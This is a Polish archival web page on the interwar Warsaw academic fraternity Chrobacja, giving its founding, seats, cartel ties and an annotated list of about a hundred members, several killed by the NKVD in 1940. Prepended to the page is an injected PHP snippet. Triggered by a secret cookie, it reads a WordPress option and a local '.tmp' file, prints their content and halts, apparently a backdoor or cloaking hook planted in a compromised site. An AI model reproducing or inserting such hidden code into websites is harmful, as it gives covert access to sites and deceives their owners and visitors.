if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Chrobacja

Dekiel Chrobacji - vide Poszukiwania. Nazwa:
Polska Akademicka Korporacja Chrobacja
Siedziba:
Warszawa
Data powstania:
19 II 1922 r.
Barwy:
jasnogranatowa – srebrna – wiśniowa (symbolika barw: przyjaźń - mądrość i wiedza - energia i siła)
Dewiza:
„Semper honeste” („Zawsze uczciwie”)

Rys historyczny

Listownik Chrobacji, 1939 r.

Chrobacja została założona, po trwających od początku roku akademickiego 1921/22 dyskusjach, dnia 19 II 1922 r. przez grupę 31 studentów uczelni warszawskich, słuchaczy Politechniki Warszawskiej, Uniwersytetu Warszawskiego oraz Szkoły Głównej Gospodarstwa Wiejskiego. Do grona założycieli należały grupy kolegów-absolwentów Gimnazjum im. Mikołaja Raja w Warszawie, absolwentów Gimnazjum w Sosnowcu, a także wcześniejszych towarzyszy broni-żołnierzy 7 Pułku Ułanów oraz 1 Pułku Artylerii Lekkiej. Część założycieli pochodziła z Zagłębia Dąbrowskiego. Nazwa korporacji nawiązuje do legendarnego plemienia Chrobatów mającego w czasach przed powstaniem państwa polskiego zamieszkiwać tereny późniejszej południowej Polski, w tym także między innymi Zagłębie.

Herb Chrobacji, 1931 r.

Krótko po powstaniu, z dniem 3 III 1922 r. Chrobacja została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 3 III 1922 r.). Kandydowała pod opieką K! Welecja. Dnia 7 V 1922 r. uzyskała prawa członka rzeczywistego Związku.

Uroczystości VI-lecia (?) Chrobacji, marzec 1928 r.

Dnia 22 II 1925 r. powstał Związek Filistrów. Od lat 20-tych przy korporacji istniało także Koło Pań.

Chrobacja zawała dnia 5 V 1927 r. trzyletni kartel z K! Gnomia z Krakowa, który w marcu 1937 r. został zamieniony na kartel wieczysty.

Siedziby korporacji mieściły się: w roku akademickim 1924/25 w Kasynie Urzędników Ministerstwa Rolnictwa i Dóbr Państwowych przy ul. Senatorskiej 15, w latach 1925-31 przy ul. Śniadeckich 19 oraz w latach 1931-33 przy ul. Żurawiej 20/44.

Chrobacja.

Całkowita ustalona, niekompletna imienna liczba członków obejmuje 106 nazwisk, w tym jednego członków honorowych.

Brak wiadomości o powojennej działalności Chrobacji i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Chrobacji obejmuje ponad 100 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Jan Kuczyński, (?), ksiądz katolicki, filister honorowy Chrobacji (?)

Członkowie rzeczywiści

 1. Franciszek Bargiełł, akt. 1924-26
 2. Adam Bloch, student WSH, c. 1932/33, akt. 1932/33
 3. Włodzimierz Boerner, student UW, c. 1927/28, akt. 1927/28-31
 4. Tadeusz Brinckenhof, student UW, założyciel Chrobacji
 5. Witold Byliński, c. 1924, akt. 1924-25 [być może Witold Adam Byliński (20 września 1904 w Ząbkowicach - po 1970) absolwent Gimnazjum Matematyczno-Przyrodniczego Stanisława Staszica w Sosnowcu, student i absolwent Wydziału Hutniczego AG 1925-36, po studiach pracował w przemyśle hutniczym]
 6. Armand Dobrzyński, student UW, założyciel Chrobacji
 7. Stanisław Dulmy, student SNP, c. 1931/32, akt. 1931/32-33
 8. Kazimierz Dziewanowski, c. 1924, akt. 1924-25
 9. Alfred Eckersdorf, student UW, założyciel Chrobacji
 10. Władysław Englicht, student SGGW, założyciel Chrobacji, akt. 1922-26
 11. Jerzy Ernst, wiceprezes, prezes sem. let. 1938/39
 12. Kazimierz Eysymont, student PW, założyciel Chrobacji
 13. Witold Eysymont, student PW, założyciel Chrobacji
 14. Stanisław Fijałkowski, student UW, od 1930 SNP, c. 1927/28, akt. 1927/28-33, sekretarz sem. zim. 1931/32
 15. Tadeusz Flisiuk, student PW, c. 1931/32, akt. 1931/32
 16. Stanisław Floręcki, student UW, c. 1927/28, akt. 1927/28
 17. Marjan Frank, student WSH, c. 1929/30, akt. 1929/30-33

  Andrzej Gadomski, 1922 r.

 18. Andrzej Gadomski, (1901 - 16 lutego 1982) brat Stanisława i Wacława (obaj Chrobacja) oraz Bronisława (Gnomia), brat stryjeczny Felicjana (Chrobacja i Gnomia), Stefana (Chrobacja) oraz Tadeusza (Gnomia), student PW, akt. 1924-29, prezes sem. let. 1925/26, w czasie II wojny światowej internowany na Litwie, po wojnie pracował jako architekt na Śląsku, wykładowca PŚ

 19. Felicjan Gadomski, (2 czerwca 1898 w Dąbrowie Górniczej - 4 października 1974 w Katowicach) s. Felicjana Izydora, brat Stefana (Chrobacja) i Tadeusza (Gnomia), brat stryjeczny Bronisława (Gnomia) oraz Andrzeja, Stanisława i Wacława (wszyscy trzej Chrobacja), absolwent Gimnazjum im. Mikołaja Reja w Warszawie, student PW, uczestnik wojny polsko-bolszewickiej 1920, student i absolwent AG 1923-31, założyciel Chrobacji, akt. 1922-32, później także w Gnomii, c. 1930, inicjator kartelu Gnomii z Chrobacją, po studiach w kopalniach “Prezydent” i “Barbara-Wyzwolenie” w Chorzowie, “Eleonora-Befina” na Śląsku Cieszyńskim, uczestnik wojny obronnej 1939, później w PSZ na Zachodzie, por. w 4 Dywizji Strzelców 1940, I Brygadzie Spadochronowej 1940-42, w 318 Dywizjonie Myśliwsko-Rozpoznawczym na Środkowym Wschodzie i we Włoszech 1942-46, po powrocie do kraju kierownik kontroli inwestycji w Zabrzańskim Zjednoczeniu Przemysłu Węglowego 1947, inspektor, zastępca naczelnika i dyrektor Okręgowego Urzędu Górniczego w Gliwicach 1948-55, główny projektant Biura Projektów Metali Nieżelaznych “Biproment” w Katowicach 1955-57, inspektor bhp w Zjednoczeniu Górniczo-Hutniczych Metali Nieżelaznych w Katowicach oraz w Jaworznicko-Mikołowskich Zjednoczenia Przemysłu Węglowego w Mysłowicach 1957-63, tłumacz w Ośrodku Branżowym Informacji Technicznej i Ekonomicznej Głównego Instytutu Górniczego w Katowicach 1963-66

  Stanisław Gadomski, 1931 r.Stanisław Gadomski, 1922 r.

 20. Stanisław Gadomski, (1898 - 1978) brat Wacława i Andrzeja (obaj Chrobacja) oraz Bronisława (Gnomia), brat stryjeczny Felicjana (Chrobacja i Gnomia), Stefana (Chrobacja) oraz Tadeusza (Gnomia), założyciel Chrobacji, akt. 1922-26, sekretarz zewn. ZPKA 1923-24 (II kadencja), prezes ZPKA 1925 (IV kadencja), Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA

  Stefan Gadomski, 1922 r.

 21. Stefan Gadomski, (1900-1956) brat Felicjana (Chrobacja i Gnomia) i Tadeusza (Gnomia), brat stryjeczny Bronisława (Gnomia) oraz Andrzeja, Stanisława i Wacława (wszyscy trzej Chrobacja), student PW, założyciel Chrobacji, akt. 1922-26

  Wacław Gadomski, 1922 r.

 22. Wacław Gadomski, (1900-1984) brat Andrzeja i Stanisława (obaj Chrobacja) oraz Bronisława (Gnomia), brat stryjeczny Felicjana (Chrobacja i Gnomia), Stefana (Chrobacja) oraz Tadeusza (Gnomia), student PW, założyciel Chrobacji, akt. 1922-32

 23. Tadeusz Gałecki, (1901 - ) student UW, założyciel Chrobacji, z której wystąpił, c. 1924 Patria, akt. 1924-25
 24. Bronisław Garliński, student WSH, c. 1929/30, akt. 1929/30-32

  Stanisław Gołębiowski, 1918 r.

 25. Stanisław Gołębiowski, (25 stycznia 1902 w maj. Przerąb na Ziemi Piotrkowskiej - 1940 w Charkowie) s. Aleksandra i Marii z Makólskich, brat Zbigniewa (Chrobacja), absolwent Gimnazjum im. Stanisława Staszica w Warszawie, ochotnik w wojnie polsko-bolszewickiej 1920, student i absolwent elektryki PW, akt. 1924-31, wiceprezes sem. zim. 1924/25, prezes sem. let. 1924/25, sekretarz zewn. ZPKA 1925-27 (V kadencja), ranny w walkach w “obronie Konstytucji” w czasie zamachu majowego 1926, po studiach pracownik Związku Elektrowni Polskich w Warszawie przy Alei Róż, por. rez. saper, ochotnik w wojnie obronnej 1939 w Baonie Elektrycznym, m.in. uczestnik bitwy nad Bzurą, w niewoli sowieckiej w obozie w Starobielsku, zamordowany przez NKWD w Charkowie, pośmiertnie awansowany na kapitana

  Zbigniew Gołębiowski, 1931/32 r.Zbigniew Gołębiowski, 1977 r.

 26. Zbigniew Gołębiowski, (31 sierpnia 1906 prawd. w miejsc. Przerąb - 18 grudnia 1997 w Londynie) s. Aleksandra i Marii z Makólskich, brat Stanisława (Chrobacja), absolwent Gimnazjum im. Stanisława Staszica w Warszawie, student WSH, c. 1929, akt. 1929-32, sekretarz sem. let. 1929/30, prezes WKM-u sem. zim. 1930/31, prezes ZPKA 1931-32 (XI kadencja), Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, we wrześniu 1939 wyjechał przez Węgry i Francję do Wielkiej Brytanii, po wojnie na emigracji w Wielkiej Brytanii, prowadził firmę sprzedającą dywany i wykładziny Atlantic Bay Ex Import Ltd. w Londynie, pochowany w Londynie

 27. Ignacy Gościcki, student PW, akt. 1924-29, olderman sem. zim. 1924/25
 28. Stefan Grochowski, student PW, c. 1925/26, akt. 1925/26-33, sekretarz sem. let. 1927/28, wiceprezes sem. zim. 1930/31, prezes sem. zim. 1932/33
 29. Wiesław Grochowski, student SGGW, c. 1931/32, akt. 1931/32-33
 30. Władysław Grzybowski, student WSH, c. 1924/25, akt. 1924/25-29
 31. Albin Hanslik, (19 grudnia 1917 - 23 października 1990) po wojnie na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu
 32. Leopold Hanze, akt. 1924/25, skreślony 1924/25
 33. Zbigniew Jachimczyk, student PW, c. 1929/30, akt. 1929/30-33
 34. Jerzy Janiszowski, student UW, c. 1932/33, akt. 1932/33
 35. Witold Janiszowski, student PW, c. 1931/32, akt. 1931/32-33
 36. Konrad Jurowski, (19 lutego 1898 w miejsc. Wielki Ustjug w gub. wołogodzkiej w Rosji - 7 stycznia 1944) herbu Przyjaciel, s. Seweryna (szlachcica grodzieńskiego i leśniczego) i Melanii z Wołyncewiczów, brat Tadeusza (Chrobacja), od 1909 uczeń Szkoły Polskiej Górskiego w Warszawie, później Szkoły Handlowej Jeżewskiego, a następnie Szkoły Handlowej w Niżnym Nowogrodzie, student med. na Wydziale Fizyko-Matematycznym Uniwersytetu w Kazaniu, a następnie od 1918 Wydziału Lekarskiego UW, dr med. 1925, c. 1924, akt. 1924-25, lekarz wojskowy, w 1927 w stopniu por. naczelny lekarz 29 pułku piechoty, internista i pediatra, w 1939 kapitan, w nieznanych oklicznościach dostał się do niewoli, prawd. był więźniem Kozielska, ale wrócił do kraju, pracował w Warszawskim Towarzystwie Dobroczynności opiekując się sierocińcami dla chłopców przy ul. Freta 10 oraz dla dziewcząt przy ul. Rakowieckiej 21, prowadził też praktykę prywatną, zmarł w nieznanych okolicznościach, wg innej informacji rozstrzelany przez KEDYW ze względu na podejrzenie kolaboracji, po wojnie zrehabilitowany, ożeniony z Wandą Mączyńską 1908, mieli syna Zbigniewa [Źródła (poza wskazanymi poniżej spisu członków): J. B. Gliński (red.), Słownik biograficzny lekarzy farmaceutów ofiar drugiej wojny światowej]

  Tadeusz Jurowski, prawd. okres wojny

 37. Tadeusz Jurowski, (7 sierpnia 1893 w miejsc. Wielki Ustjug w gub. wołogodzkiej w Rosji [wg dokumentu ślubnego w Wołogdzie] - 29 października 1968 w Londynie) herbu Przyjaciel, s. Seweryna (szlachcica grodzieńskiego i leśniczego) i Melanii z Wołyncewiczów, brat Konrada (Chrobacja), prawd. walczył w wojnie polsko-bolszewickiej, por., student i absolwent Wydziału Budowy Dróg i Mostów PW, założyciel Chrobacji, akt. 1922-33, pracował m.in. przy budowie Mostu Kierbedzia, dowódca 136 rezerwowej kompanii saperów w wojnie obronnej 1939, uczestniczył w bitwie pod Wizną, internowany na Litwie, zwolniony w 1940 i wywieziony w głąb Rosji, przeszedł z armią Andersa cały szlak bojowy Przez Persję, Palestynę, Egipt, jeszcze w Egipcie współzałożyciel Stowarzyszenia Kombatantów Polskich, a po wojnie na emigracji w Wielkiej Brytanii prezes jednego z oddziałów Stowarzyszenia w Londynie, mjr, odznaczony Krzyżem Walecznych, Złotym Krzyżem Zasługi oraz Orderem Polonia Restituta, zakładał sobotnie szkoły dla polskich dzieci, opiekował się harcerstwem, działał z zborze, dwukrotnie żonaty (1) z Józefą Emeliną Zalewską (1924), z którą miał córkę Martę Halinę, a po rozwodzie (2) z Jadwigą (?), z którą miał synów Macieja i Andrzeja, pochowany na cmentarzu w North Shen w Londynie [Źródła (poza wskazanymi poniżej spisu członków): relacja wnuczki Ewy Werner-Gzyra]

 38. Zdzisław Karczewski, c. 1924, akt. 1924-25
 39. Leon Kin, student PW, założyciel Chrobacji
 40. William Kleczka, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 41. Henryk Kochan, c. 1923, akt. 1924-25
 42. Bolesław Kołoczko, wiceprezes sem. let. 1938/39
 43. Ryszard Kowalski, student WSH, c. 1931/32, akt. 1931/32-33
 44. Kazimierz Kranodębski, student PW, założyciel Chrobacji, jeden z pierwszych filistrów
 45. Stefan Krzycki, student PW, założyciel Chrobacji, akt. 1922-25
 46. Witold Kucleb, student PW, założyciel Chrobacji
 47. Edward Kulesza, c. 1923, akt. 1924-25
 48. Jerzy Kurczabowicz, student PW, c. 1931/32, akt. 1931/32-33
 49. Mieczysław Laubitz, student PW, założyciel Chrobacji, akt. 1922-26
 50. Karol Levittoux, ( - maj 1926) c. 1924, akt. 1924-26, poległ w obronie praworządności w zamachu majowym, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA
 51. Władysław Lisicki, student WSH, c. 1927/28, akt. 1927/28-29
 52. Leszek Łuczycki, student UW, c. 1931/32, akt. 1931/32-33
 53. Zdzisław Malanowski, student UW, c. 1928/29, akt. 1928/29-33
 54. Wiktor Malecki, student WSH, akt. 1924-28
 55. Jan Malewski, student WSH, c. 1931/32, akt. 1931/32-33
 56. Ludomir Malinowski, akt. 1924-26, wiceprezes sem. let. 1924/25
 57. Witold Malinowski, student PW, założyciel Chrobacji, akt. 1922-25
 58. Paweł Maliszewski, student PW, c. 1928/29, akt. 1928/29-33
 59. Aleksander Mianowski, ( - 1969) student PW, c. 1924, akt. 1924-29, olderman sem. let. 1927/28, prezes sem. let. 1928/29
 60. Henryk Mieszkowski, student PW, akt. 1924-28, sekretarz sem. let. 1925/26
 61. Lucjan Modro, student PW, założyciel Chrobacji, akt. 1922-25
 62. Romuald Narbutowicz, student PW, c. 1927/28, akt. 1927/28–33, olderman 1932/33, sekretarz WKM-u sem. zim. 1930/31
 63. Edward (?) Neuman, student UW, założyciel Chrobacji
 64. Stefan Nowicki, ( - 1992) brat Tadeusza (Chrobacja), student SGGW, akt. 1927-33, sekretarz sem. let. 1928/29, po wojnie na emigracji w Australii
 65. Tadeusz Nowicki, (5 stycznia 1904 w Łukowie - 1940 w Katyniu), s. Jana i Franciszki z Dziewanowskich, brat Stefana (Chrobacja), uczestnik wojny polsko-rosyjskiej 1920 w 13 Pułku Piechoty, student i absolwent leśnictwa SGGW, c. 1925/26, akt. 1925/26-30, wiceprezes sem. let. 1927/28, wiceprezes sem. let. 1928/29, asystent Zakładu Chemii Organicznej SGGW, pracownik Ministerstwa Reform Rolnych, absolwent Szkoły Podchorążych Rezerwy Piechoty w Zambrowie 1932, por. rez., przydzielony do 50 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 66. Mieczysław Okoński, (1900 - 22 września 1935) w wojnie polsko-rosyjskiej 1920 (?) ochotnik 201 Pułku Szwoleżerów, urzędnik Cukrowni “Ciechanów” SA

  Witold Okoński, 1925 r.

 67. Witold Okoński, akt. 1924-25, prezes sem. zim. 1924/25

 68. Czesław Olszyński, student WSH, c. 1931/32, akt. 1931/32-33
 69. Piotr Pawlikowski, ( - 1939 pod Bzura) student UW, c. 1927/28, akt. 1927/28-32, olderman 1929/30, prezes sem. zim. 1931/32, poległ w bitwie pod Bzurą
 70. Tadeusz Plisiuk, student PW, c. 1932/33, akt. 1932/33
 71. Wiktor Pogorzelski, (20 grudnia 1899 w Kutnie - 1940 w Charkowie), s. Eugeniusza i Władysławy z Puchalskich, ochotnik WP 1918, uczestnik wojny 1918-21 w 1 Baonie Telegraficznym, student PW, akt. 1924-33, absolwent Szkoły Podchorążych Łączności w Zegrzu 1920 i Szkoły Młodszych Oficerów Artylerii w Toruniu, kpt. uzbrojenia, służył w 4 Pułku Artylerii Ciężkiej, w niewoli sowieckiej, zamordowany przez NKWD
 72. Adolf Racięcki, student UW, c. 1928/29, akt. 1928/29-33, wiceprezes wewn. sem. zim. 1932/33
 73. Stanisław Rażniewski,
 74. Paweł Richter, student PW, założyciel Chrobacji, akt. 1922-26
 75. Czesław Rudlicki, (30 kwietnia 1902 w Warszawie - 1940 w Katyniu) s. Edwarda i Janiny z Krzysińskich, student i absolwent Wydziału Inżynierii Wodnej PW, c. 1927/28, akt. 1927/28-33, wiceprezes sem. let. 1929/30, prezes sem. zim. 1930/31, absolwent Szkoły Podchorążych Rezerwy Łączności w Zegrzu 1929, ppor. rez., przydzielony do 6 Baonu Telegraficznego, w niewoli sowieckiej, zamordowany przez NKWD
 76. Leon Rudowski,
 77. Jerzy Schmidt, akt. 1924-26
 78. Antoni Sikorski, student SGGW, założyciel Chrobacji, jeden z pierwszych filistrów
 79. Włodzimierz Stadnicki, student PW, założyciel Chrobacji, akt. 1922-26
 80. Józef Stawicki,
 81. Stanisław Stalkowski, student PW, założyciel Chrobacji
 82. Wacław Szkup, student UW, c. 1931/32, akt. 1931/32-33
 83. Juljan Szajewski, c. 1923, akt. 1924-25
 84. Witold Szymański, student PW, c. 1931/32, akt. 1931/32-33
 85. Zygmunt Szymański, student PW, założyciel Chrobacji, akt. 1922-32
 86. Józef Szyrocki, sekretarz, sekretarz sem. let. 1938/39
 87. Kazimierz Śniegocki, student UW, założyciel Chrobacji
 88. Zdzisław Tadeusz Tarach, (8 października 1909 - 1940 w Katyniu), s. Ludwika i Zofii, urzędnik PKP, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim, ppor. rez., przydzielony do 21 Pułku Artylerii Lekkiej, w niewoli sowieckiej, zamordowany przez NKWD
 89. Egon Vielrose, student WSH, c. 1927/28, akt. 1927/28-33, sekretarz sem. zim. 1930/31, wiceprezes zewn. sem. zim. 1932/33
 90. Witold Jerzy Józef Wasilewski, (1899-1971) z Sosnowca, student PW, założyciel Chrobacji, akt. 1922-25, lekarz, w czasie II wojny światowej we Francji, działał w Maquis - francuskim ruchu oporu jako por.-lekarz, po zakończeniu wojny wrócił do kraju, pochowany na Cmentarzu w Sosnowcu
 91. Zbigniew Wasilewski, (1905-1980) student PW, c. 1924, akt. 1924-32, wiceprezes sem. let. 1925/26, olderman sem. let. 1928/29
 92. Zbigniew Wasilewski, student PW, akt. 1925-31, wiceprezes sem. let. 1925/26
 93. Hipolit Aleksander Wawrzyniak, (18 września 1897 w Kurczewie k. Warszawy - 1940 w Katyniu), s. Piotra i Anny z Rogalskich, członek POW, uczestnik wojny polsko-rosyjskiej 1920 w 7 Pułku Ułanów, student i absolwent 1924 prawa UW, założyciel Chrobacji, akt. 1922-25, ppor. rez., przydzielony do 7 Pułku Ułanów, odznaczony Krzyżem Walecznych, w niewoli sowieckiej, zamordowany przez NKWD
 94. Tadeusz Welfle, s. Heleny (wieloletniej prezeski Koła Pań Chrobacji), student UW, założyciel Chrobacji, akt. 1922-25
 95. Tadeusz Wieczorkiewicz, student PW, założyciel Chrobacji, jeden z pierwszych filistrów
 96. Jerzy Wierzbowski, student UW, c. 1931, akt. 1931-32, sekretarz sem. zim. 1932/33
 97. Zygmunt Wierzbowski, student PW, c. 1925/26, akt. 1925/26-31, prezes sem. let. 1927/28, prezes sem. let. 1929/30

  Henryk Wojciechowski, 1928 r.

 98. Henryk Wojciechowski, (19 stycznia 1905 w Warszawie - 1940 w Charkowie) s. Jarosława i Józefy z d. Janiak, absolwent Gimnazjum im. Jana Zamojskiego w Warszawie 1923, student i absolwent 1934 (inż. urządzeń i komunikacji miejskich) Wydziału Inżynieryjnego PW, c. 1924/25, akt. 1924/25-33, olderman sem. let. 1930/31, wiceprezes WKM-u sem. zim. 1930/31, skarbnik ZPKA 1928 (VII kadencja), po studiach kierownik ruchu, a później zawiadowca stacji w Celestynowie, następnie pracował przy modernizacji drogi Kraków-Morskie Oko, por. rez., w wojnie obronnej w 30 Pułku Piechoty, m.in. w obronie dworca lwowskiego, w więzieniu sowieckim w Starobielsku, zamordowany przez NKWD

 99. Zbigniew Wolski, student WSH, c. 1927/28, akt. 1927/28-33, wiceprezes sem. zim. 1931/32, skarbnik WKM-u sem. zim. 1930/31
 100. Zdzisław Woźniak, student WSH, c. 1932/33, akt. 1932/33
 101. Leon Woźnicki, student UW, c. 1927/28, akt. 1927/28-29
 102. Bronisław Zakrzewski, student UW, c. 1929/30, akt. 1929/30-31
 103. Jan Zieleniewski, (1903-1965) brat Stanisława (Chrobacja), sekretarz sem. zim. 1924/25
 104. Stanisław Zieleniewski, (1900-1942) brat Jana (Chrobacja), student PW, założyciel Chrobacji, akt. 1922-26, lotnik-tylni strzelec, zginął w czasie lotu bojowego zestrzelony nad Kanałem La Manche
 105. Franek (?) Żymełka (Żymełko), ( - 1944-45) olderman sem. let. 1938/39, żołnierz 1 Dywizji Pancernej PSZ gen. Maczka, zginął w walkach

Pieczęć Chrobacji, 1939 r.

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1924-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Chrobacja.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 2 VI 2013 r.
Ostatania zmiana: 3 I 2022 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Chrobacja (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 3 I 2022 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }